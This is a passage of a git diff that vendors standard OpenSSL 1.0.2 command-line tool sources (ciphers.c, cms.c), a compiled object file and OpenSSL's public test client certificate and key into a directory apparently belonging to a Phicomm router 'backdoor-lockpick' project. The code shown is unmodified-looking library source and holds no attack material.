+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+#include "apps.h"
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+#undef PROG
+#define PROG    ciphers_main
+
+static const char *ciphers_usage[] = {
+    "usage: ciphers args\n",
+    " -v          - verbose mode, a textual listing of the SSL/TLS ciphers in OpenSSL\n",
+    " -V          - even more verbose\n",
+    " -ssl2       - SSL2 mode\n",
+    " -ssl3       - SSL3 mode\n",
+    " -tls1       - TLS1 mode\n",
+    NULL
+};
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int ret = 1, i;
+    int verbose = 0, Verbose = 0;
+#ifndef OPENSSL_NO_SSL_TRACE
+    int stdname = 0;
+#endif
+    const char **pp;
+    const char *p;
+    int badops = 0;
+    SSL_CTX *ctx = NULL;
+    SSL *ssl = NULL;
+    char *ciphers = NULL;
+    const SSL_METHOD *meth = NULL;
+    STACK_OF(SSL_CIPHER) *sk;
+    char buf[512];
+    BIO *STDout = NULL;
+
+    meth = SSLv23_server_method();
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+    STDout = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+    {
+        BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+        STDout = BIO_push(tmpbio, STDout);
+    }
+#endif
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-v") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-V") == 0)
+            verbose = Verbose = 1;
+#ifndef OPENSSL_NO_SSL_TRACE
+        else if (strcmp(*argv, "-stdname") == 0)
+            stdname = verbose = 1;
+#endif
+#ifndef OPENSSL_NO_SSL2
+        else if (strcmp(*argv, "-ssl2") == 0)
+            meth = SSLv2_client_method();
+#endif
+#ifndef OPENSSL_NO_SSL3
+        else if (strcmp(*argv, "-ssl3") == 0)
+            meth = SSLv3_client_method();
+#endif
+#ifndef OPENSSL_NO_TLS1
+        else if (strcmp(*argv, "-tls1") == 0)
+            meth = TLSv1_client_method();
+#endif
+        else if ((strncmp(*argv, "-h", 2) == 0) || (strcmp(*argv, "-?") == 0)) {
+            badops = 1;
+            break;
+        } else {
+            ciphers = *argv;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+        for (pp = ciphers_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+        goto end;
+    }
+
+    OpenSSL_add_ssl_algorithms();
+
+    ctx = SSL_CTX_new(meth);
+    if (ctx == NULL)
+        goto err;
+    if (ciphers != NULL) {
+        if (!SSL_CTX_set_cipher_list(ctx, ciphers)) {
+            BIO_printf(bio_err, "Error in cipher list\n");
+            goto err;
+        }
+    }
+    ssl = SSL_new(ctx);
+    if (ssl == NULL)
+        goto err;
+
+    if (!verbose) {
+        for (i = 0;; i++) {
+            p = SSL_get_cipher_list(ssl, i);
+            if (p == NULL)
+                break;
+            if (i != 0)
+                BIO_printf(STDout, ":");
+            BIO_printf(STDout, "%s", p);
+        }
+        BIO_printf(STDout, "\n");
+    } else {                    /* verbose */
+
+        sk = SSL_get_ciphers(ssl);
+
+        for (i = 0; i < sk_SSL_CIPHER_num(sk); i++) {
+            SSL_CIPHER *c;
+
+            c = sk_SSL_CIPHER_value(sk, i);
+
+            if (Verbose) {
+                unsigned long id = SSL_CIPHER_get_id(c);
+                int id0 = (int)(id >> 24);
+                int id1 = (int)((id >> 16) & 0xffL);
+                int id2 = (int)((id >> 8) & 0xffL);
+                int id3 = (int)(id & 0xffL);
+
+                if ((id & 0xff000000L) == 0x02000000L) {
+                    /* SSL2 cipher */
+                    BIO_printf(STDout, "     0x%02X,0x%02X,0x%02X - ", id1,
+                               id2, id3);
+                } else if ((id & 0xff000000L) == 0x03000000L) {
+                    /* SSL3 cipher */
+                    BIO_printf(STDout, "          0x%02X,0x%02X - ", id2,
+                               id3);
+                } else {
+                    /* whatever */
+                    BIO_printf(STDout, "0x%02X,0x%02X,0x%02X,0x%02X - ", id0,
+                               id1, id2, id3);
+                }
+            }
+#ifndef OPENSSL_NO_SSL_TRACE
+            if (stdname) {
+                const char *nm = SSL_CIPHER_standard_name(c);
+                if (nm == NULL)
+                    nm = "UNKNOWN";
+                BIO_printf(STDout, "%s - ", nm);
+            }
+#endif
+            BIO_puts(STDout, SSL_CIPHER_description(c, buf, sizeof buf));
+        }
+    }
+
+    ret = 0;
+    if (0) {
+ err:
+        SSL_load_error_strings();
+        ERR_print_errors(bio_err);
+    }
+ end:
+    if (ctx != NULL)
+        SSL_CTX_free(ctx);
+    if (ssl != NULL)
+        SSL_free(ssl);
+    if (STDout != NULL)
+        BIO_free_all(STDout);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ciphers.o
new file mode 100644
index 0000000000000000000000000000000000000000..64b23931ed3e530d7d3b9ac045f3b48cee40b6e8
GIT binary patch
literal 6136
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
J7j5JG{|9UMrL+J5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/client.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/client.pem
new file mode 100644
index 0000000..e7a47a7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/client.pem
@@ -0,0 +1,52 @@
+subject= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = Test Client Cert
+issuer= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = OpenSSL Test Intermediate CA
+-----BEGIN CERTIFICATE-----
+MIID5zCCAs+gAwIBAgIJALnu1NlVpZ6yMA0GCSqGSIb3DQEBBQUAMHAxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMSIwIAYDVQQLDBlGT1IgVEVT
+VElORyBQVVJQT1NFUyBPTkxZMSUwIwYDVQQDDBxPcGVuU1NMIFRlc3QgSW50ZXJt
+ZWRpYXRlIENBMB4XDTExMTIwODE0MDE0OFoXDTIxMTAxNjE0MDE0OFowZDELMAkG
+A1UEBhMCVUsxFjAUBgNVBAoMDU9wZW5TU0wgR3JvdXAxIjAgBgNVBAsMGUZPUiBU
+RVNUSU5HIFBVUlBPU0VTIE9OTFkxGTAXBgNVBAMMEFRlc3QgQ2xpZW50IENlcnQw
+ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC0ranbHRLcLVqN+0BzcZpY
++yOLqxzDWT1LD9eW1stC4NzXX9/DCtSIVyN7YIHdGLrIPr64IDdXXaMRzgZ2rOKs
+lmHCAiFpO/ja99gGCJRxH0xwQatqAULfJVHeUhs7OEGOZc2nWifjqKvGfNTilP7D
+nwi69ipQFq9oS19FmhwVHk2wg7KZGHI1qDyG04UrfCZMRitvS9+UVhPpIPjuiBi2
+x3/FZIpL5gXJvvFK6xHY63oq2asyzBATntBgnP4qJFWWcvRx24wF1PnZabxuVoL2
+bPnQ/KvONDrw3IdqkKhYNTul7jEcu3OlcZIMw+7DiaKJLAzKb/bBF5gm/pwW6As9
+AgMBAAGjgY8wgYwwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSZHKyLoTh7Mb409Zn/mK1ceSDAjDAfBgNVHSMEGDAWgBQ2w2yI55X+sL3szj49
+hqshgYfa2jANBgkqhkiG9w0BAQUFAAOCAQEAD0mL7PtPYgCEuDyOQSbLpeND5hVS
+curxQdGnrJ6Acrhodb7E9ccATokeb0PLx6HBLQUicxhTZIQ9FbO43YkQcOU6C3BB
+IlwskqmtN6+VmrQzNolHCDzvxNZs9lYL2VbGPGqVRyjZeHpoAlf9cQr8PgDb4d4b
+vUx2KAhHQvV2nkmYvKyXcgnRuHggumF87mkxidriGAEFwH4qfOqetUg64WyxP7P2
+QLipm04SyQa7ONtIApfVXgHcE42Py4/f4arzCzMjKe3VyhGkS7nsT55X/fWgTaRm
+CQPkO+H94P958WTvQDt77bQ+D3IvYaVvfil8n6HJMOJfFT0LJuSUbpSXJg==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAtK2p2x0S3C1ajftAc3GaWPsji6scw1k9Sw/XltbLQuDc11/f
+wwrUiFcje2CB3Ri6yD6+uCA3V12jEc4GdqzirJZhwgIhaTv42vfYBgiUcR9McEGr
+agFC3yVR3lIbOzhBjmXNp1on46irxnzU4pT+w58IuvYqUBavaEtfRZocFR5NsIOy
+mRhyNag8htOFK3wmTEYrb0vflFYT6SD47ogYtsd/xWSKS+YFyb7xSusR2Ot6Ktmr
+MswQE57QYJz+KiRVlnL0cduMBdT52Wm8blaC9mz50PyrzjQ68NyHapCoWDU7pe4x
+HLtzpXGSDMPuw4miiSwMym/2wReYJv6cFugLPQIDAQABAoIBAAZOyc9MhIwLSU4L
+p4RgQvM4UVVe8/Id+3XTZ8NsXExJbWxXfIhiqGjaIfL8u4vsgRjcl+v1s/jo2/iT
+KMab4o4D8gXD7UavQVDjtjb/ta79WL3SjRl2Uc9YjjMkyq6WmDNQeo2NKDdafCTB
+1uzSJtLNipB8Z53ELPuHJhxX9QMHrMnuha49riQgXZ7buP9iQrHJFhImBjSzbxJx
+L+TI6rkyLSf9Wi0Pd3L27Ob3QWNfNRYNSeTE+08eSRChkur5W0RuXAcuAICdQlCl
+LBvWO/LmmvbzCqiDcgy/TliSb6CGGwgiNG7LJZmlkYNj8laGwalNlYZs3UrVv6NO
+Br2loAECgYEA2kvCvPGj0Dg/6g7WhXDvAkEbcaL1tSeCxBbNH+6HS2UWMWvyTtCn
+/bbD519QIdkvayy1QjEf32GV/UjUVmlULMLBcDy0DGjtL3+XpIhLKWDNxN1v1/ai
+1oz23ZJCOgnk6K4qtFtlRS1XtynjA+rBetvYvLP9SKeFrnpzCgaA2r0CgYEA0+KX
+1ACXDTNH5ySX3kMjSS9xdINf+OOw4CvPHFwbtc9aqk2HePlEsBTz5I/W3rKwXva3
+NqZ/bRqVVeZB/hHKFywgdUQk2Uc5z/S7Lw70/w1HubNTXGU06Ngb6zOFAo/o/TwZ
+zTP1BMIKSOB6PAZPS3l+aLO4FRIRotfFhgRHOoECgYEAmiZbqt8cJaJDB/5YYDzC
+mp3tSk6gIb936Q6M5VqkMYp9pIKsxhk0N8aDCnTU+kIK6SzWBpr3/d9Ecmqmfyq7
+5SvWO3KyVf0WWK9KH0abhOm2BKm2HBQvI0DB5u8sUx2/hsvOnjPYDISbZ11t0MtK
+u35Zy89yMYcSsIYJjG/ROCUCgYEAgI2P9G5PNxEP5OtMwOsW84Y3Xat/hPAQFlI+
+HES+AzbFGWJkeT8zL2nm95tVkFP1sggZ7Kxjz3w7cpx7GX0NkbWSE9O+T51pNASV
+tN1sQ3p5M+/a+cnlqgfEGJVvc7iAcXQPa3LEi5h2yPR49QYXAgG6cifn3dDSpmwn
+SUI7PQECgYEApGCIIpSRPLAEHTGmP87RBL1smurhwmy2s/pghkvUkWehtxg0sGHh
+kuaqDWcskogv+QC0sVdytiLSz8G0DwcEcsHK1Fkyb8A+ayiw6jWJDo2m9+IF4Fww
+1Te6jFPYDESnbhq7+TLGgHGhtwcu5cnb4vSuYXGXKupZGzoLOBbv1Zw=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.c
new file mode 100644
index 0000000..2c8ada6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/cms.c
@@ -0,0 +1,1351 @@
+/* apps/cms.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+/* CMS utility function */
+
+#include <stdio.h>
+#include <string.h>
+#include "apps.h"
+
+#ifndef OPENSSL_NO_CMS
+
+# include <openssl/crypto.h>
+# include <openssl/pem.h>
+# include <openssl/err.h>
+# include <openssl/x509_vfy.h>
+# include <openssl/x509v3.h>
+# include <openssl/cms.h>
+
+# undef PROG
+# define PROG cms_main
+static int save_certs(char *signerfile, STACK_OF(X509) *signers);
+static int cms_cb(int ok, X509_STORE_CTX *ctx);
+static void receipt_request_print(BIO *out, CMS_ContentInfo *cms);
+static CMS_ReceiptRequest *make_receipt_request(STACK_OF(OPENSSL_STRING)
+                                                *rr_to, int rr_allorfirst, STACK_OF(OPENSSL_STRING)
+                                                *rr_from);
+static int cms_set_pkey_param(EVP_PKEY_CTX *pctx,
+                              STACK_OF(OPENSSL_STRING) *param);
+
+# define SMIME_OP        0x10
+# define SMIME_IP        0x20
+# define SMIME_SIGNERS   0x40
+# define SMIME_ENCRYPT           (1 | SMIME_OP)
+# define SMIME_DECRYPT           (2 | SMIME_IP)
+# define SMIME_SIGN              (3 | SMIME_OP | SMIME_SIGNERS)
+# define SMIME_VERIFY            (4 | SMIME_IP)
+# define SMIME_CMSOUT            (5 | SMIME_IP | SMIME_OP)
+# define SMIME_RESIGN            (6 | SMIME_IP | SMIME_OP | SMIME_SIGNERS)
+# define SMIME_DATAOUT           (7 | SMIME_IP)
+# define SMIME_DATA_CREATE       (8 | SMIME_OP)
+# define SMIME_DIGEST_VERIFY     (9 | SMIME_IP)
+# define SMIME_DIGEST_CREATE     (10 | SMIME_OP)
+# define SMIME_UNCOMPRESS        (11 | SMIME_IP)
+# define SMIME_COMPRESS          (12 | SMIME_OP)
+# define SMIME_ENCRYPTED_DECRYPT (13 | SMIME_IP)
+# define SMIME_ENCRYPTED_ENCRYPT (14 | SMIME_OP)
+# define SMIME_SIGN_RECEIPT      (15 | SMIME_IP | SMIME_OP)
+# define SMIME_VERIFY_RECEIPT    (16 | SMIME_IP)
+
+int verify_err = 0;
+
+typedef struct cms_key_param_st cms_key_param;
+
+struct cms_key_param_st {
+    int idx;
+    STACK_OF(OPENSSL_STRING) *param;
+    cms_key_param *next;
+};
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    int operation = 0;
+    int ret = 0;
+    char **args;
+    const char *inmode = "r", *outmode = "w";
+    char *infile = NULL, *outfile = NULL, *rctfile = NULL;
+    char *signerfile = NULL, *recipfile = NULL;
+    STACK_OF(OPENSSL_STRING) *sksigners = NULL, *skkeys = NULL;
+    char *certfile = NULL, *keyfile = NULL, *contfile = NULL;
+    char *certsoutfile = NULL;
+    const EVP_CIPHER *cipher = NULL, *wrap_cipher = NULL;
+    CMS_ContentInfo *cms = NULL, *rcms = NULL;
+    X509_STORE *store = NULL;
+    X509 *cert = NULL, *recip = NULL, *signer = NULL;
+    EVP_PKEY *key = NULL;
+    STACK_OF(X509) *encerts = NULL, *other = NULL;
+    BIO *in = NULL, *out = NULL, *indata = NULL, *rctin = NULL;
+    int badarg = 0;
+    int flags = CMS_DETACHED, noout = 0, print = 0;
+    int verify_retcode = 0;
+    int rr_print = 0, rr_allorfirst = -1;
+    STACK_OF(OPENSSL_STRING) *rr_to = NULL, *rr_from = NULL;
+    CMS_ReceiptRequest *rr = NULL;
+    char *to = NULL, *from = NULL, *subject = NULL;
+    char *CAfile = NULL, *CApath = NULL;
+    char *passargin = NULL, *passin = NULL;
+    char *inrand = NULL;
+    int need_rand = 0;
+    const EVP_MD *sign_md = NULL;
+    int informat = FORMAT_SMIME, outformat = FORMAT_SMIME;
+    int rctformat = FORMAT_SMIME, keyform = FORMAT_PEM;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    unsigned char *secret_key = NULL, *secret_keyid = NULL;
+    unsigned char *pwri_pass = NULL, *pwri_tmp = NULL;
+    size_t secret_keylen = 0, secret_keyidlen = 0;
+
+    cms_key_param *key_first = NULL, *key_param = NULL;
+
+    ASN1_OBJECT *econtent_type = NULL;
+
+    X509_VERIFY_PARAM *vpm = NULL;
+
+    args = argv + 1;
+    ret = 1;
+
+    apps_startup();
+
+    if (bio_err == NULL) {
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+    }
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+    while (!badarg && *args && *args[0] == '-') {
+        if (!strcmp(*args, "-encrypt"))
+            operation = SMIME_ENCRYPT;
+        else if (!strcmp(*args, "-decrypt"))
+            operation = SMIME_DECRYPT;
+        else if (!strcmp(*args, "-sign"))
+            operation = SMIME_SIGN;
+        else if (!strcmp(*args, "-sign_receipt"))
+            operation = SMIME_SIGN_RECEIPT;
+        else if (!strcmp(*args, "-resign"))
+            operation = SMIME_RESIGN;
+        else if (!strcmp(*args, "-verify"))
+            operation = SMIME_VERIFY;
+        else if (!strcmp(*args, "-verify_retcode"))
+            verify_retcode = 1;
+        else if (!strcmp(*args, "-verify_receipt")) {
+            operation = SMIME_VERIFY_RECEIPT;
+            if (!args[1])
+                goto argerr;
+            args++;
+            rctfile = *args;
+        } else if (!strcmp(*args, "-cmsout"))
+            operation = SMIME_CMSOUT;
+        else if (!strcmp(*args, "-data_out"))
+            operation = SMIME_DATAOUT;
+        else if (!strcmp(*args, "-data_create"))
+            operation = SMIME_DATA_CREATE;
+        else if (!strcmp(*args, "-digest_verify"))
+            operation = SMIME_DIGEST_VERIFY;
+        else if (!strcmp(*args, "-digest_create"))
+            operation = SMIME_DIGEST_CREATE;
+        else if (!strcmp(*args, "-compress"))
+            operation = SMIME_COMPRESS;
+        else if (!strcmp(*args, "-uncompress"))
+            operation = SMIME_UNCOMPRESS;
+        else if (!strcmp(*args, "-EncryptedData_decrypt"))
+            operation = SMIME_ENCRYPTED_DECRYPT;
+        else if (!strcmp(*args, "-EncryptedData_encrypt"))
+            operation = SMIME_ENCRYPTED_ENCRYPT;
+# ifndef OPENSSL_NO_DES
+        else if (!strcmp(*args, "-des3"))
+            cipher = EVP_des_ede3_cbc();
+        else if (!strcmp(*args, "-des"))
+            cipher = EVP_des_cbc();
+        else if (!strcmp(*args, "-des3-wrap"))
+            wrap_cipher = EVP_des_ede3_wrap();
+# endif
+# ifndef OPENSSL_NO_SEED
+        else if (!strcmp(*args, "-seed"))
+            cipher = EVP_seed_cbc();
+# endif
+# ifndef OPENSSL_NO_RC2
+        else if (!strcmp(*args, "-rc2-40"))
+            cipher = EVP_rc2_40_cbc();
+        else if (!strcmp(*args, "-rc2-128"))
+            cipher = EVP_rc2_cbc();
+        else if (!strcmp(*args, "-rc2-64"))
+            cipher = EVP_rc2_64_cbc();
+# endif
+# ifndef OPENSSL_NO_AES
+        else if (!strcmp(*args, "-aes128"))
+            cipher = EVP_aes_128_cbc();
+        else if (!strcmp(*args, "-aes192"))
+            cipher = EVP_aes_192_cbc();
+        else if (!strcmp(*args, "-aes256"))
+            cipher = EVP_aes_256_cbc();
+        else if (!strcmp(*args, "-aes128-wrap"))
+            wrap_cipher = EVP_aes_128_wrap();
+        else if (!strcmp(*args, "-aes192-wrap"))
+            wrap_cipher = EVP_aes_192_wrap();
+        else if (!strcmp(*args, "-aes256-wrap"))
+            wrap_cipher = EVP_aes_256_wrap();
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        else if (!strcmp(*args, "-camellia128"))
+            cipher = EVP_camellia_128_cbc();
+        else if (!strcmp(*args, "-camellia192"))
+            cipher = EVP_camellia_192_cbc();
+        else if (!strcmp(*args, "-camellia256"))
+            cipher = EVP_camellia_256_cbc();
+# endif
+        else if (!strcmp(*args, "-debug_decrypt"))
+            flags |= CMS_DEBUG_DECRYPT;
+        else if (!strcmp(*args, "-text"))
+            flags |= CMS_TEXT;
+        else if (!strcmp(*args, "-nointern"))
+            flags |= CMS_NOINTERN;
+        else if (!strcmp(*args, "-noverify")
+                 || !strcmp(*args, "-no_signer_cert_verify"))
+            flags |= CMS_NO_SIGNER_CERT_VERIFY;
+        else if (!strcmp(*args, "-nocerts"))
+            flags |= CMS_NOCERTS;
+        else if (!strcmp(*args, "-noattr"))
+            flags |= CMS_NOATTR;
+        else if (!strcmp(*args, "-nodetach"))
+            flags &= ~CMS_DETACHED;
+        else if (!strcmp(*args, "-nosmimecap"))
+            flags |= CMS_NOSMIMECAP;
+        else if (!strcmp(*args, "-binary"))
+            flags |= CMS_BINARY;
+        else if (!strcmp(*args, "-keyid"))
+            flags |= CMS_USE_KEYID;
+        else if (!strcmp(*args, "-nosigs"))
+            flags |= CMS_NOSIGS;
+        else if (!strcmp(*args, "-no_content_verify"))
